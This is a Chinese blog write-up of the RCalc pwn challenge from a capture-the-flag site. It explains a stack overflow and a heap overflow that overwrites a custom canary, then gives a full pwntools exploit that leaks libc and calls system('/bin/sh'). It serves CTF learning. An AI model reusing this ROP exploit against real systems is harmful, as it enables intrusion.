攻防世界PWN之RCalc题解

最新推荐文章于 2024-05-30 01:32:57 发布
最新推荐文章于 2024-05-30 01:32:57 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103147834
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

RCalc

首先,检查一下程序的保护机制,还不错,只开了NX

然后,我们用IDA分析

看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数

然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了

然后,我们继续看其他函数

这个样子,好像是canary的保护机制啊。这不就是他自己写了一个类似于canary的东西吗

原来那么一大堆,只是为了完成堆溢出检测罢了

scanf这里有一个栈溢出

这里是保存计算结果到堆里

其中,它没有检查堆溢出,里面的数据可以无限制的添加

canary的操作

我们可以看出,他自己写的canary机制是把值存到一个堆里,并且遵循栈的性质

  1. typedef struct {  
  2.     int top;  
  3.     int *data;  
  4. } Canarys;  

再重新看看创建堆的操作,经过分析,第一个0x100堆用来存放计算结果,第二个0x320堆用来存放n个canary的值。由于创建的顺序是0x100的那个用来保存计算结果的堆先创建,并且之前没有free操作,那么0x100堆的后面就是0x320堆,我们可以从0x100堆里溢出到0x320堆里,覆盖canary的值为我们自己设置的值,这样就绕过了这个检测机制,然后就是正常的ROP操作了。

调试看看

所以,需要保存(0Xceb160-0xceb050) / 8 = 0x22个整数后,就可以溢出了

  1. def setCanary(canary):  
  2.    for i in range(0x22):  
  3.       sh.sendlineafter('Your choice:','1')  
  4.       sh.sendlineafter('input 2 integer:','0')  
  5.       sh.sendline('1')  
  6.       sh.sendlineafter('Save the result?','yes')  
  7.    sh.sendlineafter('Your choice:','1')  
  8.    sh.sendlineafter('input 2 integer:','0')  
  9.    sh.sendline(str(canary))  
  10.    sh.sendlineafter('Save the result?','yes')  

本题,由于是使用scanf来输入payload中的,因此,我们的payload中不能出现0x20(空格)数据,也就是地址里,不能有0x20数据,因此这些got表都用不了,放入payload的话,scanf遇到0x20就会停止输入,从而造成payload输入不完整。

但是,上面的那个__libc_start_main或__gmon_start__倒是可以用来泄露,因为他们的got表地址没有0x20

Puts也不能用了,因为有0x20

我们用printf

那么,我们先泄露__libc_start_main加载地址,计算出libc地址

  1. payload = 'a'*0x108 + p64(mycanary) + 'a'*0x8 + p64(pop_rdi) + p64(__libc_start_main_got) + p64(printf_plt) + p64(main_addr)  
  2. sh.sendlineafter('Input your name pls: ',payload)  
  3. #现在我们要通过堆溢出,把canary的值改成我们的mycanary  
  4. setCanary(mycanary)  
  5. sh.sendlineafter('Your choice:','5')  

这里有个奇怪的问题,当mycanary为非0时,printf会报错

所以我们的mycanary统一就都为0吧

 

于是,我们最终的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. context.log_level = 'debug'  
  5.   
  6. #sh = remote('111.198.29.45',49895)  
  7. sh = process('./RCalc')  
  8. elf = ELF('./RCalc')  
  9. libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  
  10. printf_plt = elf.plt['printf']  
  11. __libc_start_main_got = elf.got['__libc_start_main']  
  12. #pop_rdi用于64位函数传参  
  13. pop_rdi = 0x401123  
  14. main_addr = 0x401036  
  15. #我们自己设置canary,不知道为什么,如果非0,printf会报段错误  
  16. mycanary = 0  
  17.   
  18. print hex(__libc_start_main_got)  
  19.   
  20. def setCanary(canary):  
  21.    for i in range(0x22):  
  22.       sh.sendlineafter('Your choice:','1')  
  23.       sh.sendlineafter('input 2 integer:','0')  
  24.       sh.sendline('1')  
  25.       sh.sendlineafter('Save the result?','yes')  
  26.    sh.sendlineafter('Your choice:','1')  
  27.    sh.sendlineafter('input 2 integer:','0')  
  28.    sh.sendline(str(canary))  
  29.    sh.sendlineafter('Save the result?','yes')  
  30.   
  31. #注意,我们的payload中不能有0x20数据,因为这是空格,会导致数据截断  
  32. #我们先写ROP到栈里  
  33. payload = 'a'*0x108 + p64(mycanary) + 'a'*0x8 + p64(pop_rdi) + p64(__libc_start_main_got) + p64(printf_plt) + p64(main_addr)  
  34. sh.sendlineafter('Input your name pls: ',payload)  
  35. #现在我们要通过堆溢出,把canary的值改成我们的mycanary  
  36. setCanary(mycanary)  
  37. sh.sendlineafter('Your choice:','5')  
  38.   
  39. __libc_start_main_addr = u64(sh.recv(6).ljust(8,'\x00'))  
  40. #获取libc基地址  
  41. libc_base = __libc_start_main_addr - libc.sym['__libc_start_main']  
  42. system_addr = libc_base + libc.sym['system']  
  43. binsh_addr = libc_base + libc.search('/bin/sh').next()  
  44. print 'libc_base=',hex(libc_base)  
  45.   
  46. payload = 'a'*0x108 + p64(mycanary) + 'a'*0x8 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)  
  47. sh.sendlineafter('Input your name pls: ',payload)  
  48. setCanary(mycanary)  
  49. sh.sendlineafter('Your choice:','5')  
  50.   
  51.   
  52. sh.interactive() 
ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Rcalc(xctf)
weixin_43868725的博客
08-30 353
0x0 程序保护和流程 保护: 流程: main() init_heap() qword_6020F8存放着第一个申请的chunk,qword_6020F0存放着第二个申请的chunk,*(qword_6020F8+8)存放着第三个申请的chunk,*(qword_6020F0+8)存放着第四个申请的chunk real_main() 程序没有开启canary保护,但是通过create_random()和get_random()实现了canary的功能。在输入name的时候没有限制长度,存在栈溢出。
攻防世界 Newbie_calculations
weixin_53349587的博客
03-12 686
程序在运行的时候不能输入值,本来以为是程序故意设置成这样的,分析之后在知道原来是程序正在加载,而且没有获取输入的函数,程序执行完就可以输出flag,但是程序中的while循环太多了,导致程序一直执行不下去,先看一下main函数: 通过观察不难看出,主函数中一共有sub_291000、sub_291100和sub_291220这三个函数 ,而且导致程序执行不下去的代码也在这三个函数中,我们只需分析这三个函数的具体作用,从而简化函数,重新编写main函数即可得到flag。 sub_291000:
攻防世界pwn RCalc
PLpa的博客
02-22 464
需要知识:ROP,堆溢出 发现查询没开PIE和canary。 程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。 这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。 但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机...
攻防世界---你猜猜
最新发布
2201_75556700的博客
05-30 773
5、需要密码,破解密码,密码为:123456(这里题目描述是你猜猜,想着它的密码不会太难,应该是纯数字,试到第六位的时候就出来了)2、将编码转为字符串,看到了PK和flag.txt。1、下载附件,得到文本,里面是十六进制。3、将16进制转为文件(
攻防世界 newbie_calc
qq_42882717的博客
11-26 227
//#include<iostream> #include<stdio.h> //using namespace std; int sub_401100(int a, int b) { return a * b; } int sub_401000(int a, int b) { return a + b; } int sub_401220(int a, int b) { return a - b; } int main() { int v3; // eax int ...
攻防世界PWNcalc2题解
seaaseesa的博客
12-12 1085
calc2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/sh来getshell 发现,该程序是一个四则运算表达式计算程序 其中,我...
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 900
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1399
学习pwn开始,慢慢来不要急
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 428
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 513
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1590
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
[RoarCTF 2019]Easy Calc攻防世界 ics07、[极客大挑战 2019]EasySQL
weixin_52268949的博客
04-22 670
利用点就在上面这串代码中,这里先把文件名拼接到backup目录下,然后正则匹配,这里正则的意思是:匹配最后一个点后面的后缀,然后下面的else里面又更改了当前目录。然后通过POST方式写入con和file,一个为文件内容一个为文件路径,又因为有正则匹配的过滤,我们将文件名取名为5.php/.,又因为这是Linux操作系统所以可以解析那么接下来我们上传文件即可。通过这段代码发现只需要result有值我们就可以上传文件了,一开始我的思路是通过sql注入完成但是失败了,这时候我们看一下sql查询的条件。
[XCTF-pwn] 30_xctf-3rd-RCTF-2017_rcalc
weixin_52640415的博客
03-09 222
程序本身有溢出,未开pie,got表可写。但是calc有密码校验。 数据结构: 两个0x20块存计数器和指针 0x110块存输入数据 0x330块存使用的密码每次向后加一个提前放入 漏洞: 指针下边界无限制可溢出写,每次会写入输入的数据,通过输入超过33个数覆盖密码区。 思路: 先溢出写入rop 向前移动输入块,清密码1(返回时候用) 选择退出,这时与当前密码指针重叠,可以绕过检查 退出后执行rop得到libc并重入 同1-4写入system(/bin/sh) 完整ex...
RCTF-RCalc WP
qq_41252520的博客
07-28 624
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
接上一篇的pwn题,exp解析及pwntools相关使用。
qq_43474199的博客
09-26 1275
from pwn import * from LibcSearcher import * context(log_level='debug') #offset=32 sh=process('./pwn1.bak') elf=ELF('./pwn1.bak') #gdb.attach(sh,'b *0x400e9d') sh.recvuntil("choice:") sh.sendline('1'...
攻防世界 ————你猜猜
woshicainiao666的博客
09-18 357
1.下载附件 ,用记事本打开看到是16进制,因为字母最大的是F和0-9的组合,所以我们猜测是16进制。,得到一个zip,里面有加密的flag.txt,我猜密码是123456,没想到真是123456。5.最后得到flag——————daczcasdqwdcsdzasd。解码,看到里面包含flag.txt。
攻防世界supermarket
qq_44370676的博客
08-25 381
首先检查保护机制 然后运行一下 是一个菜单题,接着往下看 可以看到,选项3会按行打印出每个商品的信息,在des.后面就是商品的description 接着IDA分析 首先看看sub_8048864() sub_8048812就是读入一串字符串到nptr,这一块并没有溢出点,但是这里并不是以%d的方式输入数字,而是先输入字符串然后用atoi函数转换,如果能够修改atoi的got表为system并且输入/bin/sh那么我们的目的便达成了。接着往下看,看能不能实现这.
1000levevls(xctf)
weixin_43868725的博客
09-02 300
0x0 程序保护和流程 保护: 流程: main() 输入1进入go(),输入2进入hint(),输入3退出程序。 go() 根据输入数字的大小确定check()的递归次数。 可以发现存在栈溢出漏洞。 hint() 如果unk_20208C的值不为零就输出system函数的地址。 0x1 利用过程 1.因为程序开启了pie所以无法通过栈溢出泄露地址。只能看一下能否修改unk_20208C的值输出system函数的地址,但是找不到修改unk_20208C的方法。 2.只能看一下system函数的地址
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1509
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值